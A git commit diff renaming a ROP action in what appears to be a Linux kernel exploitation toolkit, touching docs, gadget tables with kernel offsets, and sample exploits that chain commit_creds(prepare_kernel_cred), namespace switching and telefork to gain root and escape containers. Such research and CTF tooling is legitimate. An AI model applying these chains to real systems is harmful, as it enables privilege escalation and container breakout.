rename COMMIT_KERNEL_CREDS -> COMMIT_INIT_TASK_CREDS / commit_creds(prepare_kernel_cred(&init_task))

koczkatamas · koczkatamas · commit 75a5624dffdc · 2025-08-27T11:57:39.000Z
diff --git a/Documentation/how_to_get_started.md b/Documentation/how_to_get_started.md
@@ -87,7 +87,7 @@ After leaking a kernel address and calculating the KASLR base, you can begin con
 
     ```c++
     RopChain rop(target, kaslr_base);
-    rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+    rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
     RopUtils::Ret2Usr(rop, (void*)win);
     ```
 
diff --git a/Documentation/kxdb_database.md b/Documentation/kxdb_database.md
@@ -40,7 +40,7 @@ This database can be included into the exploit binary as a binary blob or can be
 
   * ROP actions (configurable ROP chains which execute predefined functionality):
     * `msleep(ARG_time_msec)`
-    * `commit_kernel_cred(prepare_kernel_cred(0))`
+    * `commit_creds(prepare_kernel_cred(&init_task))`
     * `switch_task_namespaces(find_task_by_vpid(ARG_vpid=1), init_nsproxy)`
     * `write_what_where_64(ARG_address, ARG_new_value)`
     * `fork()`
diff --git a/Documentation/sample_exploit.md b/Documentation/sample_exploit.md
@@ -231,7 +231,7 @@ The steps to substitude deleted sections could be like this:
 
     +    printf("[+] ROP chain:\n");
     +    RopChain rop(target, kernel_base);
-    +    rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+    +    rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
     +    rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1});
     +    rop.AddRopAction(RopActionId::TELEFORK, {100000});
     +    HexDump::Print(rop.GetData());
diff --git a/kernel_rop_generator/rop_samples.py b/kernel_rop_generator/rop_samples.py
@@ -20,17 +20,15 @@
             RopChainArgument(argument_index=0),
             RopChainOffset(kernel_offset=0x227a50, description="msleep()")]),
 
-        # commit_kernel_cred(prepare_kernel_cred(0))
         RopAction(
-          description="commit_kernel_cred(prepare_kernel_cred(0))",
+          description="commit_creds(prepare_kernel_cred(0))",
           gadgets=[
             RopChainOffset(kernel_offset=0x21f5, description="pop rdi"),
             RopChainConstant(value=0),
             RopChainOffset(kernel_offset=0x1be800, description="prepare_kernel_cred()"),
             RopChainOffset(kernel_offset=0x17caa80, description="mov rax, rdi"),
-            RopChainOffset(kernel_offset=0x1be550, description="commit_kernel_cred()")]),
+            RopChainOffset(kernel_offset=0x1be550, description="commit_creds()")]),
 
-        # switch_task_namespaces(find_task_by_vpid(ARG_vpid), init_nsproxy)
         RopAction(
           description="switch_task_namespaces(find_task_by_vpid(ARG_vpid), init_nsproxy)",
           gadgets=[
diff --git a/kxdb_tool/converter/config.py b/kxdb_tool/converter/config.py
@@ -24,7 +24,7 @@
 
 rop_actions = [
     "msleep(ARG_time_msec)",
-    "commit_kernel_cred(prepare_kernel_cred(0))",
+    "commit_creds(prepare_kernel_cred(&init_task))",
     "switch_task_namespaces(find_task_by_vpid(ARG_vpid=1), init_nsproxy)",
     "write_what_where_64(ARG_address, ARG_new_value)",
     "fork()",
diff --git a/kxdb_tool/test/config.py b/kxdb_tool/test/config.py
@@ -17,7 +17,7 @@
 
 rop_actions = [
     "msleep(ARG_time_msec)",
-    "commit_kernel_cred(prepare_kernel_cred(0))",
+    "commit_creds(prepare_kernel_cred(&init_task))",
     "switch_task_namespaces(find_task_by_vpid(ARG_vpid=1), init_nsproxy)",
     "write_what_where_64(ARG_address, ARG_new_value)",
     "fork()",
diff --git a/kxdb_tool/test/mock_db/releases/kernelctf/lts-6.1.36/rop_actions.json b/kxdb_tool/test/mock_db/releases/kernelctf/lts-6.1.36/rop_actions.json
@@ -18,7 +18,7 @@
     },
     {
         "type_id": 2,
-        "description": "commit_kernel_cred(prepare_kernel_cred(0))",
+        "description": "commit_creds(prepare_kernel_cred(0))",
         "gadgets": [
             {
                 "kernel_offset": 8682,
diff --git a/libxdk/include/kernelXDK/target/Target.h b/libxdk/include/kernelXDK/target/Target.h
@@ -8,7 +8,7 @@
 
 enum struct RopActionId: uint32_t {
     MSLEEP = 0x01,
-    COMMIT_KERNEL_CREDS = 0x02,
+    COMMIT_INIT_TASK_CREDS = 0x02,
     SWITCH_TASK_NAMESPACES = 0x03,
     WRITE_WHAT_WHERE_64 = 0x04,
     FORK = 0x5,
diff --git a/libxdk/samples/exp111/exploit.cpp b/libxdk/samples/exp111/exploit.cpp
@@ -307,7 +307,7 @@ int main (int argc, char **argv) {
 
     printf("[+] ROP chain:\n");
     RopChain rop(target, kernel_base);
-    rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+    rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
     rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1});
     rop.AddRopAction(RopActionId::TELEFORK, {100000});
     HexDump::Print(rop.GetData());
diff --git a/libxdk/samples/exp151/exploit.cpp b/libxdk/samples/exp151/exploit.cpp
@@ -291,7 +291,7 @@ int exploit(struct nl_sock *socket){
     //Step 7: Dump `nft_table F`. We have dump it in [1]
     printf("[+] ROP chain:\n");
     RopChain rop(target, kernel_base);
-    rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+    rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
     rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1});
     rop.AddRopAction(RopActionId::TELEFORK, {1000000});
     HexDump::Print(rop.GetData());
diff --git a/libxdk/samples/exp65/exploit.cpp b/libxdk/samples/exp65/exploit.cpp
@@ -597,7 +597,7 @@ int main(int argc, char **argv)
 
 	printf("[+] ROP chain:\n");
         RopChain rop(target, kernel_base);
-        rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+        rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
         rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1});
         rop.AddRopAction(RopActionId::TELEFORK, {1000000});
         HexDump::Print(rop.GetData());
diff --git a/libxdk/samples/exp93_98/exploit.cpp b/libxdk/samples/exp93_98/exploit.cpp
@@ -293,7 +293,7 @@ int main (int argc, char **argv) {
 
     printf("[+] ROP chain:\n");
     RopChain rop(target, kernel_base);
-    rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+    rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
     rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1});
     rop.AddRopAction(RopActionId::TELEFORK, {100000});
     HexDump::Print(rop.GetData());
diff --git a/libxdk/samples/stack_pivot_and_rop/exploit.cpp b/libxdk/samples/stack_pivot_and_rop/exploit.cpp
@@ -92,7 +92,7 @@ int main(int argc, const char** argv) {
         fake_action.values.push_back(ret_addr);
     rop.actions_.push_back(fake_action);
 
-    rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+    rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
     RopUtils::Ret2Usr(rop, (void*)win);
     rop.Add(0xffffffff41414141);
     HexDump::Print(rop.GetData());
diff --git a/libxdk/target/Target.cpp b/libxdk/target/Target.cpp
@@ -7,7 +7,7 @@
 
 std::map<RopActionId, std::string> RopActionNames {
     { RopActionId::MSLEEP, "msleep" },
-    { RopActionId::COMMIT_KERNEL_CREDS, "commit_kernel_cred" },
+    { RopActionId::COMMIT_INIT_TASK_CREDS, "commit_creds" },
     { RopActionId::SWITCH_TASK_NAMESPACES, "switch_task_namespaces" },
     { RopActionId::WRITE_WHAT_WHERE_64, "write_what_where_64" },
     { RopActionId::FORK, "fork" },
diff --git a/libxdk/test/tests/PivotTests.h b/libxdk/test/tests/PivotTests.h
@@ -70,7 +70,7 @@ class PivotTests: public TestSuite {
         auto target = lts6181;
 
         RopChain rop(target, kaslr_base);
-        rop.AddRopAction(RopActionId::COMMIT_KERNEL_CREDS);
+        rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS);
         rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, { 1 });
         rop.AddRopAction(RopActionId::TELEFORK, { 5000 });
 
diff --git a/libxdk/test/tests/RopActionTests.h b/libxdk/test/tests/RopActionTests.h
@@ -62,12 +62,10 @@ class RopActionTests: public TestSuite {
         return ExecuteRopChain(rop);
     }
 
-    // TODO: this will crash the kernel if called with --repeat as COMMIT_KERNEL_CREDS currently does
-    //   not call prepare_kernel_creds, just commit_creds(init_cred) because of "mov rdi, rax" gadgets issues.
-    TEST_METHOD(commitCredsTest, "COMMIT_KERNEL_CREDS is working") {
+    TEST_METHOD(commitCredsTest, "COMMIT_INIT_TASK_CREDS is working") {
         setuid(1);
         ASSERT_EQ(1, getuid());
-        ExecuteRopAction(RopActionId::COMMIT_KERNEL_CREDS, {}, 100, 128);
+        ExecuteRopAction(RopActionId::COMMIT_INIT_TASK_CREDS, {}, 100, 128);
         ASSERT_EQ(0, getuid());
     }
 

Original file line number	Diff line number	Diff line change
`@@ -18,7 +18,7 @@`
`18`	`18`	`},`
`19`	`19`	`{`
`20`	`20`	`"type_id": 2,`
`21`		`- "description": "commit_kernel_cred(prepare_kernel_cred(0))",`
	`21`	`+ "description": "commit_creds(prepare_kernel_cred(0))",`
`22`	`22`	`"gadgets": [`
`23`	`23`	`{`
`24`	`24`	`"kernel_offset": 8682,`